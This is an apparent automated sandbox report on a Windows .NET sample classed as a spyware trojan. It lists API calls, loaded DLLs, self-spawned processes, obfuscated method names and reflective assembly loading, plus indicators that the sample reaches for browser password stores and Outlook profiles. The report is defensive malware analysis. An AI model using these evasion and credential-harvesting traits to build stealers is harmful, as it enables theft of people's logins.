                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@3/3
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n8l3NmC5EH.exe.logJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMutant created: NULL
                Source: n8l3NmC5EH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: n8l3NmC5EH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, n8l3NmC5EH.exe, 00000003.00000002.3795724526.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: n8l3NmC5EH.exeVirustotal: Detection: 75%
                Source: n8l3NmC5EH.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: n8l3NmC5EH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: n8l3NmC5EH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: n8l3NmC5EH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: WOBv.pdbSHA256 source: n8l3NmC5EH.exe
                Source: Binary string: WOBv.pdb source: n8l3NmC5EH.exe

                Data Obfuscation

                barindex
                Source: 0.2.n8l3NmC5EH.exe.40da528.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.cs.Net Code: bkXcqFAGVb System.Reflection.Assembly.Load(byte[])
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.cs.Net Code: bkXcqFAGVb System.Reflection.Assembly.Load(byte[])
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.cs.Net Code: bkXcqFAGVb System.Reflection.Assembly.Load(byte[])
                Source: 0.2.n8l3NmC5EH.exe.40ba508.1.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: n8l3NmC5EH.exeStatic PE information: 0xFE5D7A99 [Thu Mar 26 19:31:37 2105 UTC]
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_07487750 push cs; ret 0_2_07487751
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0775D4D5 push FFFFFF8Bh; iretd 0_2_0775D4D7
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 0_2_0775BD28 push esp; ret 0_2_0775BE05
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_01079C30 push esp; retf 0119h3_2_01079D55
                Source: n8l3NmC5EH.exeStatic PE information: section name: .text entropy: 7.766773390925057
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, kAgg8l2sijaXejHB40.csHigh entropy of concatenated method names: 'bV3m7KK6vX', 'fnXmvyPC64', 'C6q4fVhlLQ', 'nWx4gPpFLo', 'AjomGForCc', 'mqemik6Qu1', 'rMfm0DYuJ5', 'W6Qm5gr9sS', 'nFom3pddbe', 'fovmkqGBmS'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ECwjKMMNiOdRA7uAlg.csHigh entropy of concatenated method names: 'RXhd55vALu', 'dWkd3MxyE5', 'cF6dkrQgKo', 'M6udwsWCZ2', 'wBydlT5PiI', 'jUwd2SwDYo', 'fZJdPPKT3x', 'UZBd777emi', 'BrLdB1h7CK', 'AySdvmxnV9'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, HnEYjDPnWSeiubcCxY.csHigh entropy of concatenated method names: 'bt2tSa7LGP', 'wOPtm0fHe7', 'yJ9ttU6CAq', 'FobtY3r9v6', 'lj0tKeye7D', 'guxtyUBYtR', 'Dispose', 'U9K4JxxQ9t', 'fk54dxsqAH', 'esA49ORbAE'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, W8StgQNVUPN6UaF5Po.csHigh entropy of concatenated method names: 'wq99HvRhWt', 'YAR96oGWOu', 'jOD9MZiOwo', 'Waf9NxIlTv', 'GSk9SB5MlR', 'RtM9T6wyqx', 'Rh99mn6YkU', 'KcS94hNpyc', 'v889t3YG88', 'WCV9D4qFMM'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, atVKPSx2tbLvbWqRD8.csHigh entropy of concatenated method names: 'brJOCrstiS', 'HowOdAO2Cm', 'Yt0ORTUhjR', 'orIOU4AxQH', 'In8OIeOAi3', 'UbjRlXWd2q', 'L3OR2bZLOH', 'KW7RPplAgT', 'IwBR7K8jKx', 'CVBRBuHINt'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, W571SEgfpXscu85C0rV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E1TDG1AqEG', 'Y1kDi12uRV', 'QI1D0eKWc8', 'ch4D5FHxxk', 'UPPD3Ws39m', 'OFRDkqql5W', 'HxADwmUh6f'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, liVkvfggQSD8XmxErJo.csHigh entropy of concatenated method names: 'ORPDvls96B', 'IN0DzIr6IP', 'guJYf0Mb6g', 'RffYg720mr', 'JbqYskTUjK', 'OMyYXsgjdD', 'yTuYc48esA', 'ecKYC8YU4v', 'hECYJ3XjcD', 'LtKYdh0DDD'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, qA4Mfq5f2bJoMiWHK5.csHigh entropy of concatenated method names: 'c3pSW29dld', 'j27SiZnALl', 'fFwS55sjRV', 'NflS3PJSIL', 'OdIS8QB1jX', 'bv2SpqBeeS', 'VEMSaohZfe', 'wEHSQfJJwm', 'lAASbQYs8X', 'UBjSLNg6O3'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ERft7DgcBL5iFFQDmx5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gVoetSQ0rd', 'w9NeDm88D6', 'CTeeYD8NZ4', 'GQ9eeJCqyD', 'PQteKaZCSM', 'fXUeFn2C3Y', 's26eyJ3Vgw'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, eVanR68tnSKQK66uPD.csHigh entropy of concatenated method names: 'q1t5RWlrK58jD3O8Dcq', 'S4GvYVlCay6HKuCX6BS', 'LclO4EmH2v', 'BLUOtOHF2n', 'jKdODXispV', 'Y7tu8vlce1CXjftGFbF', 'JPqEPDlWx4gCaASIjb1', 'KIZgYhlkp8Au87yhUb3'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, aSjEPsLbuW3jf20UBT.csHigh entropy of concatenated method names: 'c0yUJsOCFi', 'voBU9CyGRx', 'gN8UOHVmV5', 'rrLOvRTYjJ', 'ELtOz0rKgq', 'cByUfpgAUN', 'CNCUg0MA7k', 'M2PUsuAcFk', 'VdpUX5RtIN', 'paFUcdsuN6'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, jsBSrpdl90mkPRHphX.csHigh entropy of concatenated method names: 'Dispose', 'oeigBubcCx', 'n00s8Fp8C9', 'sXxs8GvxH9', 'tKZgvc4bAC', 'fpsgzuYBvO', 'ProcessDialogKey', 'cV8sf7pQ8C', 'AdLsgVw6QA', 'EL1ssW8EUl'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, fYlf55uO9qRUHNRX8e.csHigh entropy of concatenated method names: 'SKFUn9ZuEK', 'IS2Urea5iQ', 'IreUqQ0XQw', 'aSbUHxKEUm', 'BO7Uo2gFWh', 'qxTU66mduf', 'ECyU11B1wT', 'qFFUMZPqPc', 'yJkUNdPIQl', 'y69UV6NrHL'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, H7pQ8CBHdLVw6QANL1.csHigh entropy of concatenated method names: 'wWxtxxQcKq', 'Dp4t8VpZgh', 'OqQtpvFxvb', 'od7tar8Qv7', 'YLBtQxdGdN', 'AJDtbCijDr', 'xKWtLot9Mo', 'TnTtAKLQZd', 'ktEtufV5Rc', 'vFZtWcD98a'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, LM0OeQV9x9n8HxvovT.csHigh entropy of concatenated method names: 'b3gRobTMr8', 'e7eR13FAug', 'R7b9pHsb1B', 'CD29aFyrYc', 'iZe9QILBQV', 'QcN9bcCAJA', 'UGM9LLyrpS', 'CKg9AqOhUI', 'ISy9uHKRZF', 'thN9WqyWLY'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, BaxJhW0F4KUltsVN4x.csHigh entropy of concatenated method names: 'qkyjMaucwk', 'd77jNCa5Fc', 'puZjxIVDXo', 'tYyj8OKqii', 'kNZjafdrRE', 'uEUjQlPGt9', 'F0djLFTGyd', 'gu5jAAposY', 'bXLjWVwwd1', 'CVvjGOOJgT'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, FZkNlusRgZCphNaaw4.csHigh entropy of concatenated method names: 'JG3qiTvfo', 'aqhHvnfAE', 'xD36JBIPK', 'd9s1qZEbS', 'Gn6NS7Nse', 'c7bVC4vLE', 'FYr45SGcdiZhlPruB3', 'dvos04orDNIn5kAEds', 'Xoh4SpvDg', 'PK5D17psV'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, UL3kywkE1DcMHcp6yo.csHigh entropy of concatenated method names: 'ToString', 'zQJTGmNVgY', 's3gT83pIY2', 'vQbTp2SItl', 'ihrTasgMV9', 'j9qTQ7QM8N', 'HfVTbT3bTR', 'kqPTLeHnNE', 'BUFTAlII5p', 'HaQTuCCbb6'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.csHigh entropy of concatenated method names: 'f2YXC7CAWF', 'Y1tXJ0ASSd', 'h6NXdybaG3', 'mwXX9rPIJO', 'YOvXRbcxDg', 'XZsXOhDZes', 'KKcXUTjXBX', 'zi9XIW38X3', 'ej2Xh3MiRl', 'e8SXZ6UviL'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, J3rUP09BcynVHwjb7x.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BwesBGA1uy', 'iJesvc9aT1', 'P30sz9OTKp', 'KiyXf6hTM7', 'jSgXgHEfrc', 'mLIXs9DvEZ', 'TewXXvtA9G', 'Xj08rGaJ7WZyQK3xVOr'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, N8EUlbvG3jS7xNCTuj.csHigh entropy of concatenated method names: 'jUUD9oKqYv', 'CuTDRlHPZ2', 'JeiDOIcVsl', 'hhRDURIb4m', 'DsBDt4VrZA', 'aZWDIwewES', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, v1HahZzrDNN7Xf4KYj.csHigh entropy of concatenated method names: 'XR9D6JN0pH', 'Xc5DMmRB8H', 'dIBDNg5ZHw', 'k4SDx0FN15', 'VxdD8nmesc', 'nwRDakXoYP', 'gDODQTeX1X', 'oPpDyYNGO0', 'bZADnrYNOc', 'cS0DrEyfOv'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, fmgILnc5aLBALle6mb.csHigh entropy of concatenated method names: 'UHNgUCwjKM', 'EiOgIdRA7u', 'JVUgZPN6Ua', 'w5PgEoLM0O', 'GvogSvTftV', 'vPSgT2tbLv', 'xpZxOnN86EMeiCefYc', 'waWweJK9LpK6eZ4oN5', 'rRcggnX618', 'TEEgXDoVGi'
                Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ggu6BDwa8ZgZHdPNpy.csHigh entropy of concatenated method names: 'lq0mZwyusT', 'vSlmEj6QwK', 'ToString', 'YPsmJJuK0N', 'wLMmdmDKXd', 'VfQm9e7Mue', 'QV9mRlFiiL', 'R53mOQZsSd', 'tkvmU3hx0C', 'wwimIyQeMX'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, kAgg8l2sijaXejHB40.csHigh entropy of concatenated method names: 'bV3m7KK6vX', 'fnXmvyPC64', 'C6q4fVhlLQ', 'nWx4gPpFLo', 'AjomGForCc', 'mqemik6Qu1', 'rMfm0DYuJ5', 'W6Qm5gr9sS', 'nFom3pddbe', 'fovmkqGBmS'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ECwjKMMNiOdRA7uAlg.csHigh entropy of concatenated method names: 'RXhd55vALu', 'dWkd3MxyE5', 'cF6dkrQgKo', 'M6udwsWCZ2', 'wBydlT5PiI', 'jUwd2SwDYo', 'fZJdPPKT3x', 'UZBd777emi', 'BrLdB1h7CK', 'AySdvmxnV9'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, HnEYjDPnWSeiubcCxY.csHigh entropy of concatenated method names: 'bt2tSa7LGP', 'wOPtm0fHe7', 'yJ9ttU6CAq', 'FobtY3r9v6', 'lj0tKeye7D', 'guxtyUBYtR', 'Dispose', 'U9K4JxxQ9t', 'fk54dxsqAH', 'esA49ORbAE'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, W8StgQNVUPN6UaF5Po.csHigh entropy of concatenated method names: 'wq99HvRhWt', 'YAR96oGWOu', 'jOD9MZiOwo', 'Waf9NxIlTv', 'GSk9SB5MlR', 'RtM9T6wyqx', 'Rh99mn6YkU', 'KcS94hNpyc', 'v889t3YG88', 'WCV9D4qFMM'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, atVKPSx2tbLvbWqRD8.csHigh entropy of concatenated method names: 'brJOCrstiS', 'HowOdAO2Cm', 'Yt0ORTUhjR', 'orIOU4AxQH', 'In8OIeOAi3', 'UbjRlXWd2q', 'L3OR2bZLOH', 'KW7RPplAgT', 'IwBR7K8jKx', 'CVBRBuHINt'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, W571SEgfpXscu85C0rV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E1TDG1AqEG', 'Y1kDi12uRV', 'QI1D0eKWc8', 'ch4D5FHxxk', 'UPPD3Ws39m', 'OFRDkqql5W', 'HxADwmUh6f'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, liVkvfggQSD8XmxErJo.csHigh entropy of concatenated method names: 'ORPDvls96B', 'IN0DzIr6IP', 'guJYf0Mb6g', 'RffYg720mr', 'JbqYskTUjK', 'OMyYXsgjdD', 'yTuYc48esA', 'ecKYC8YU4v', 'hECYJ3XjcD', 'LtKYdh0DDD'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, qA4Mfq5f2bJoMiWHK5.csHigh entropy of concatenated method names: 'c3pSW29dld', 'j27SiZnALl', 'fFwS55sjRV', 'NflS3PJSIL', 'OdIS8QB1jX', 'bv2SpqBeeS', 'VEMSaohZfe', 'wEHSQfJJwm', 'lAASbQYs8X', 'UBjSLNg6O3'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ERft7DgcBL5iFFQDmx5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gVoetSQ0rd', 'w9NeDm88D6', 'CTeeYD8NZ4', 'GQ9eeJCqyD', 'PQteKaZCSM', 'fXUeFn2C3Y', 's26eyJ3Vgw'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, eVanR68tnSKQK66uPD.csHigh entropy of concatenated method names: 'q1t5RWlrK58jD3O8Dcq', 'S4GvYVlCay6HKuCX6BS', 'LclO4EmH2v', 'BLUOtOHF2n', 'jKdODXispV', 'Y7tu8vlce1CXjftGFbF', 'JPqEPDlWx4gCaASIjb1', 'KIZgYhlkp8Au87yhUb3'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, aSjEPsLbuW3jf20UBT.csHigh entropy of concatenated method names: 'c0yUJsOCFi', 'voBU9CyGRx', 'gN8UOHVmV5', 'rrLOvRTYjJ', 'ELtOz0rKgq', 'cByUfpgAUN', 'CNCUg0MA7k', 'M2PUsuAcFk', 'VdpUX5RtIN', 'paFUcdsuN6'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, jsBSrpdl90mkPRHphX.csHigh entropy of concatenated method names: 'Dispose', 'oeigBubcCx', 'n00s8Fp8C9', 'sXxs8GvxH9', 'tKZgvc4bAC', 'fpsgzuYBvO', 'ProcessDialogKey', 'cV8sf7pQ8C', 'AdLsgVw6QA', 'EL1ssW8EUl'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, fYlf55uO9qRUHNRX8e.csHigh entropy of concatenated method names: 'SKFUn9ZuEK', 'IS2Urea5iQ', 'IreUqQ0XQw', 'aSbUHxKEUm', 'BO7Uo2gFWh', 'qxTU66mduf', 'ECyU11B1wT', 'qFFUMZPqPc', 'yJkUNdPIQl', 'y69UV6NrHL'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, H7pQ8CBHdLVw6QANL1.csHigh entropy of concatenated method names: 'wWxtxxQcKq', 'Dp4t8VpZgh', 'OqQtpvFxvb', 'od7tar8Qv7', 'YLBtQxdGdN', 'AJDtbCijDr', 'xKWtLot9Mo', 'TnTtAKLQZd', 'ktEtufV5Rc', 'vFZtWcD98a'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, LM0OeQV9x9n8HxvovT.csHigh entropy of concatenated method names: 'b3gRobTMr8', 'e7eR13FAug', 'R7b9pHsb1B', 'CD29aFyrYc', 'iZe9QILBQV', 'QcN9bcCAJA', 'UGM9LLyrpS', 'CKg9AqOhUI', 'ISy9uHKRZF', 'thN9WqyWLY'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, BaxJhW0F4KUltsVN4x.csHigh entropy of concatenated method names: 'qkyjMaucwk', 'd77jNCa5Fc', 'puZjxIVDXo', 'tYyj8OKqii', 'kNZjafdrRE', 'uEUjQlPGt9', 'F0djLFTGyd', 'gu5jAAposY', 'bXLjWVwwd1', 'CVvjGOOJgT'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, FZkNlusRgZCphNaaw4.csHigh entropy of concatenated method names: 'JG3qiTvfo', 'aqhHvnfAE', 'xD36JBIPK', 'd9s1qZEbS', 'Gn6NS7Nse', 'c7bVC4vLE', 'FYr45SGcdiZhlPruB3', 'dvos04orDNIn5kAEds', 'Xoh4SpvDg', 'PK5D17psV'
